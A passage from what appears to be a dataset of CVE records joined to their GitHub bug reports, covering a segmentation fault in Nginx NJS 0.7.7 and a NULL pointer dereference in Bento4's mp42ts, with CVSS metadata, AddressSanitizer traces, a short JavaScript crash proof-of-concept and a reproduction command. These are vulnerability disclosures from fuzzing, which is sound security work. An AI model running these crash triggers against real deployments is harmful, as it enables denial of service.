China](http://www.nipc.org.cn/), [Hexhive](http://hexhive.epfl.ch/)),(Zhongguancun Laboratory) Thansk for your time!
there are some vulnerabilities in binary mp4split
https://api.github.com/repos/axiomatic-systems/Bento4/issues/756/comments
2
2022-09-14T11:20:27Z
2023-06-26T06:40:26Z
https://github.com/axiomatic-systems/Bento4/issues/756
1,372,814,057
756
CVE-2022-38890
2022-09-15T16:15:10.687
Nginx NJS v0.7.7 was discovered to contain a segmentation violation via njs_utf8_next at src/njs_utf8.h
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/569" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.7:*:*:*:*:*:*:*", "matchCriteriaId": "B99556AB-3BAC-4553-8CDC-17292CF06AA8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/nginx/njs/issues/569
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
the call stack is different with https://github.com/nginx/njs/issues/522 ``` Environment commit: 569292e0a74f2b1ec09566f3329f82bdd0d58e87 version: 0.7.7 Build : ./configure --cc=clang --address-sanitizer=YES make ``` Poc ```js function placeholder(){} function main() { var v2 = String.fromCharCode(-950135168); var v3 = v2.trimEnd(String); var v8 = 512 >>> "multiline"; var v9 = String.fromCharCode(788580.490736339); var v10 = v9.padEnd(v8,v3); var v11 = v10.lastIndexOf(788580.490736339); } main(); ``` Asan ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==1550478==ERROR: AddressSanitizer: SEGV on unknown address 0x6170bebedece (pc 0x000000505f0e bp 0x7fff88dc8f70 sp 0x7fff88dc8e40 T0) ==1550478==The signal is caused by a READ memory access. #0 0x505f0e in njs_utf8_next /data/test-njs/njs/src/njs_utf8.h:54:20 #1 0x505f0e in njs_string_offset /data/test-njs/njs/src/njs_string.c:2545:17 #2 0x505f0e in njs_string_prototype_last_index_of /data/test-njs/njs/src/njs_string.c:2309:13 #3 0x53df7c in njs_function_native_call /data/test-njs/njs/src/njs_function.c:742:11 #4 0x4e5117 in njs_vmcode_interpreter /data/test-njs/njs/src/njs_vmcode.c:801:23 #5 0x53d466 in njs_function_lambda_call /data/test-njs/njs/src/njs_function.c:693:11 #6 0x4e5117 in njs_vmcode_interpreter /data/test-njs/njs/src/njs_vmcode.c:801:23 #7 0x4df05a in njs_vm_start /data/test-njs/njs/src/njs_vm.c:543:11 #8 0x4c7f89 in njs_process_script /data/test-njs/njs/src/njs_shell.c:919:19 #9 0x4c73b1 in njs_process_file /data/test-njs/njs/src/njs_shell.c:648:11 #10 0x4c73b1 in main /data/test-njs/njs/src/njs_shell.c:314:15 #11 0x7f75066e7082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #12 0x41daad in _start (/data/test-njs/njs/build/njs+0x41daad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /data/test-njs/njs/src/njs_utf8.h:54:20 in njs_utf8_next ==1550478==ABORTING ``` Credit ret2ddme
Another way to trigger SEGV in njs_utf8_next cause oob read
https://api.github.com/repos/nginx/njs/issues/569/comments
2
2022-08-25T02:58:03Z
2022-09-02T00:51:09Z
https://github.com/nginx/njs/issues/569
1,350,249,226
569
CVE-2022-40774
2022-09-18T19:15:09.277
An issue was discovered in Bento4 through 1.6.0-639. There is a NULL pointer dereference in AP4_StszAtom::GetSampleSize.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/757" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*", "matchCriteriaId": "180AEBD6-AF89-4F0F-856E-D8B977C762C0", "versionEndExcluding": null, "versionEndIncluding": "1.6.0-639", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/757
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi There, I tested the binary mp42ts with my fuzzer, and a crash incurred, i.e., SEGV on an unknown address error. Here are the details: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==6287==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000007021ab bp 0x7fff9e86cb50 sp 0x7fff9e86c5f0 T0) ==6287==The signal is caused by a READ memory access. ==6287==Hint: address points to the zero page. #0 0x7021ab in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) (/fuzztest/mp42ts/mp42ts+0x7021ab) #1 0x5754fc in AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&) (/fuzztest/mp42ts/mp42ts+0x5754fc) #2 0x40d0cb in TrackSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) (/fuzztest/mp42ts/mp42ts+0x40d0cb) #3 0x418342 in main (/fuzztest/mp42ts/mp42ts+0x418342) #4 0x7f9ae1a41c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #5 0x407c99 in _start (/fuzztest/mp42ts/mp42ts+0x407c99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/fuzztest/mp42ts/mp42ts+0x7021ab) in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) ==6287==ABORTING ``` ### System Details Test Machine: Ubuntu 18.04 (docker) Project Name: mp42ts (Bento4-1.6.0-639) ### Command ./mp42ts mp42ts.demo /dev/null ### Poc [mp42ts_Poc.zip](https://github.com/axiomatic-systems/Bento4/files/9590796/mp42ts_Poc.zip) ### Credit Wanying Cao (NCNIPC of China), (Zhongguancun Laboratory) Han Zheng (NCNIPC of China, [Hexhive](http://hexhive.epfl.ch/)), (Zhongguancun Laboratory)
SEGV at AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) in binary mp42ts
https://api.github.com/repos/axiomatic-systems/Bento4/issues/757/comments
2
2022-09-17T03:04:47Z
2023-06-26T09:40:27Z
https://github.com/axiomatic-systems/Bento4/issues/757
1,376,646,543
757